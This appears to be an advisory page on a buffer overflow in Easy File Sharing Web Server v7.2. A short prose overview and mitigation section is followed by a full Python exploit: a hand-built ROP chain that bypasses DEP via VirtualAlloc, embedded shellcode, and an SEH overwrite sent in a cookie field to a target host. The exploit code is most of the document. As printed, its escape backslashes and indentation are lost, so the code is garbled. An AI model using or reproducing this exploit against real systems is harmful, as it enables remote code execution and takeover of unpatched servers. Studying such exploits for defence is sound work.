Overview
The Easy File Sharing Web Server v7.2 vulnerability is a critical buffer overflow issue that can be exploited by attackers to execute arbitrary code on affected systems. This security flaw arises from improper handling of user input, allowing malicious actors to manipulate memory allocation and potentially gain unauthorized access to sensitive data or control over the server.
Technical Details
This vulnerability occurs when the Easy File Sharing Web Server fails to adequately validate the length of input data in specific fields. When an overly long input is supplied, it can overwrite adjacent memory locations, leading to a buffer overflow. Attackers can craft a specially designed request that triggers this overflow, enabling them to inject and execute malicious code. The exploitation of this vulnerability typically involves sending a payload that contains executable code, which can then be run with the permissions of the server process.
For instance, an attacker could use a simple script to send a long HTTP request to the server, causing it to crash or execute arbitrary commands. This method can be particularly devastating in environments where the web server runs with elevated privileges, exposing critical system functions.
Impact
The potential consequences of exploiting this vulnerability are severe. Successful exploitation can lead to unauthorized access, data theft, service disruptions, and even complete system takeover. Organizations relying on Easy File Sharing Web Server for file sharing or other services may find themselves at risk of significant financial loss, reputational damage, and legal implications due to compromised data integrity.
Mitigation
To protect against this vulnerability, it is crucial for organizations to implement immediate measures. First, administrators should ensure that they are using the latest version of the software, as updates often include critical security patches. If upgrading is not feasible, consider disabling unnecessary features or restricting access to the server from untrusted networks.
Additionally, employing a robust web application firewall (WAF) can help detect and block malicious requests before they reach the server. Regular security assessments and penetration testing should also be conducted to identify and remediate potential vulnerabilities proactively. By adopting these practices, organizations can significantly reduce their risk exposure and enhance their overall cybersecurity posture.
Proof of Concept (PoC)
poc.py
# Exploit title: Easy File Sharing Web Server v7.2 - Buffer Overflow
# Date: 16/10/2025
# Exploit Author: Donwor
# X: @real_Donwor
# Discord: Donwor
# Website: https://github.com/D0nw0r
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 10,11
#
# Notes:
# - I wanted to re-do other PoCs because I did not want to use mona rop chain, so instead I built my own for practice and I believe it can help others.
# - The ROP chain was VERY challenging to build, mainly because there were a lot of limimitations when moving data between for example EAX and ESI
# - based on DEP SEH buffer overflow exploit by Knaps (https://www.exploit-db.com/exploits/38829/)
# - bad chars: 'x00' and 'x3b'
import struct, sys, socket
host = sys.argv[1]
port = 80
size = 5000
rop = struct.pack("<I", 0x1001ba81) # # MOV EAX,EBP # POP EDI # POP ESI # POP EBP # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) # junk for pop edi
rop += struct.pack("<I", 0x41414141) # junk for pop edi
rop += struct.pack("<I", 0x41414141) # junk for ebp
rop += struct.pack("<I", 0x1001db66) # : # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0xffffeff8) # pop esi to align eax, will point after the hybjks
rop += struct.pack("<I", 0x10022f45) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<I", 0x41414141) # # SUB EAX,ESI # POP EDI # POP ESI # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x61c0a798) # XCHG EAX,EDI # RETN )
rop += struct.pack("<L", 0x1001d626) # : # XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # (RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
## Save ESP on ESI and EDI
rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN
rop += struct.pack("<L", 0x1004D1FC) # VirtualAlloc Addr on IAT
rop += struct.pack("<L", 0x1002248c) # deref VirtualAlloc : # MOV EAX,DWORD PTR [EAX] # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # put virtualalloc addr on stack # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi(RVA : 0x00021a3e) : # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 4 bytes more (next arg) (RVA : 0x0001715d) : # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
# Virtual Alloc on stack
# Esi now has "SRP" we need to fill it
# EDI still points to orignal one (Virtual alloc)
rop += struct.pack("<L", 0x1001f595) # Put SRP addr on eax MOV EAX,ESI # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # ADD EAX,20 # RETN
rop += struct.pack("<L", 0x10019457) # eax now points to x more (can be changed)
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001e80b) # This immedeately patches SRP and VirtualAlloc 1st arg! MOV DWORD PTR [ESI+8],EAX # MOV DWORD PTR [ESI+4],EAX # POP ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
# Virtual alloc | SRP | Shellcode Addr
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 12 bytes more (->dwsize) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001c15d) # XOR EAX,EAX # RETN) #
rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN
rop += struct.pack("<L", 0xffffffff) # -1
rop += struct.pack("<L", 0x100231d1) # will turn eax into 1, second arg of virtualalloc NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) #
rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx
#VirtualAlloc | SRP | ShellcodeAddr | dwSize
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 16 bytes more (->flAllocation Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN
rop += struct.pack("<I", 0xffffefff) # value to pop eax now
rop += struct.pack("<L", 0x100231d1) # will turn eax into 1002 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) #
rop += struct.pack("<I", 0x1001b7ca)# eax now 1000 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx
#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType
# edi -> virtualalloc
rop += struct.pack("<L", 0x1001d626) # prepare esi for another round XOR ESI,ESI # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x10021a3e) # put original stack pointer in esi # ADD ESI,EDI # RETN 0x00 ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) # increase esi to point 20 bytes more (->flProtect Type) # INC ESI # ADD AL,3A # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x1001715d) #
rop += struct.pack("<L", 0x10015442) # : # POP EAX # RETN
rop += struct.pack("<I", 0xffffffbf) # : -41
rop += struct.pack("<L", 0x100231d1) # will turn eax into 41 NEG EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}) #
rop += struct.pack("<I", 0x1001b7ca)# eax now 40 # DEC EAX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x1001a8e3) # patch arg # MOV DWORD PTR [ESI],EAX # OR EAX,0FFFFFFFF # POP ESI # POP EBX # RETN ** [ImageLoad.dll] ** | {PAGE_EXECUTE_READ}
rop += struct.pack("<L", 0x41414141) # junk pop esi
rop += struct.pack("<L", 0x41414141) # junk pop ebx
#VirtualAlloc | SRP | ShellcodeAddr | dwSize | flAllocationType | flProtect
# edi -> virtualalloc
rop += struct.pack("<L", 0x61c0a798) # # XCHG EAX,EDI # RETN
rop += struct.pack("<L", 0x61c07ff8) # XCHG EAX,ESP # RETN
# Just switch execution now, move the stack pointer to EDI (VirtualAlloc)
sc = b""
sc += b"x81xc4x24xfaxffxff" # add esp , -1500
sc += b"xbdx04xaex2ax98xdbxcexd9x74x24xf4x5b"
sc += b"x31xc9xb1x5ex83xebxfcx31x6bx11x03x6b"
sc += b"x11xe2xf1x52xc2x17xf9xaax13x48xc8x78"
sc += b"x9ax6dx4exf6xcfx5dx05x5axfcx16x4bx4f"
sc += b"x77x5ax43x60x30xd1xb5x4fxc1xd7x79x03"
sc += b"x01x79x05x5ex56x59x34x91xabx98x71x67"
sc += b"xc1x75x2fxf3x7bx9ax44x41x40xcdx5bx96"
sc += b"x33xb1x23x93x84x46x9fx9axd4xf7x94xc5"
sc += b"xf4x7cxe2xedxf5x51x77xc4x82x69x3exe6"
sc += b"x95x19xf4x83x6bxc8xc5x53xc7x35xeax59"
sc += b"x19x71xccx81x6cx89x2fx3fx77x4ax52x9b"
sc += b"xf2x4dxf4x68xa4xa9x05xbcx33x39x09x09"
sc += b"x37x65x0dx8cx94x1dx29x05x1bxf2xb8x5d"
sc += b"x38xd6xe1x06x21x4fx4fxe8x5ex8fx37x55"
sc += b"xfbxdbxd5x80x7bx24x26xadx21xb3xebx60"
sc += b"xdax43x63xf2xa9x71x2cxa8x25x3axa5x76"
sc += b"xb1x4bxa1x88x6dxf3xa1x76x8ex04xe8xbc"
sc += b"xdax54x82x15x63x3fx52x99xb6xaax58x0d"
sc += b"xf9x83x64xc7x91xd1x94xd6xdax5fx72x88"
sc += b"x4cx30x2ax69x3dxf0x9ax01x57xffxc5x32"
sc += b"x58xd5x6exd8xb7x80xc7x75x21x89x93xe4"
sc += b"xaex07xdex27x24xa2x1fxe9xcdxc7x33x1e"
sc += b"xaax27xcbxdfx5fx28xa1xdbxc9x7fx5dxe6"
sc += b"x2cxb7xc2x19x1bxcbx04xe5xdaxfax7fxd0"
sc += b"x48x43x17x1dx9dx43xe7x4bxf7x43x8fx2b"
sc += b"xa3x17xaax33x7ex04x67xa6x81x7dxd4x61"
sc += b"xeax83x03x45xb5x7cx66xd5xb2x83xf5xf2"
sc += b"x1axecx05x43x9bxecx6fx43xcbx84x64x6c"
sc += b"xe4x64x85xa7xadxecx0cx26x1fx8cx11x63"
sc += b"xc1x10x12x80xdaxa3x69xe9xddx43x8exe3"
sc += b"xb9x43x8fx0bxbcx78x46x32xcaxbfx5bx01"
sc += b"xd5x5dx71x7cx7exf8x10x3dxe3xfbxcfx02"
sc += b"x1ax78xe5xfaxd9x60x8cxffxa6x26x7dx72"
sc += b"xb6xc2x81x21xb7xc6"
padding = b"x45" * 4 # 4 bytes of padding because of the alignment, the add eax,20 instructions will make it so stack points 4 bytes after
rop += padding
rop += sc
rop += b"x42" * (1244 - len(rop))
nseh = struct.pack("<I", 0x43434343)
seh = struct.pack("<I", 0x10022877) # add esp, 1004; ret
eax_offset = 4183
buf = b"A" * 2811 # rop chain start after add esp 1004
buf += rop
buf += b"A" * (4059 - len(buf)) #nseh
buf += nseh + seh
buf += b"A" * (eax_offset - len(buf))
buf += struct.pack("<I", 0xffffffff) #" #make sure eax always trigger exception
buf += b"A" * (size - len(buf))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host ,port))
httpreq = (
b"GET /changeuser.ghp HTTP/1.1rn"
b"User-Agent: Mozilla/4.0rn"
b"Host:" + host.encode() + b":" + str(port).encode() + b"rn"
b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
b"Accept-Language: en-usrn"
b"Accept-Encoding: gzip, deflatern"
b"Referer: http://" + host.encode() + b"/rn"
b"Cookie: SESSIONID=6771; UserID=" + buf + b"; PassWD=;rn"
b"Conection: Keep-Alivernrn"
)
# Send payload to the server
try:
if len(sys.argv) < 2:
print("[!] Usage: python3 exploit.py <IP of Server>")
sys.exit(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
print("[+] Packet sent!")
except:
print("[!] Could not connect to server / Exploit failed")
sys.exit(1)
sys.exit(0)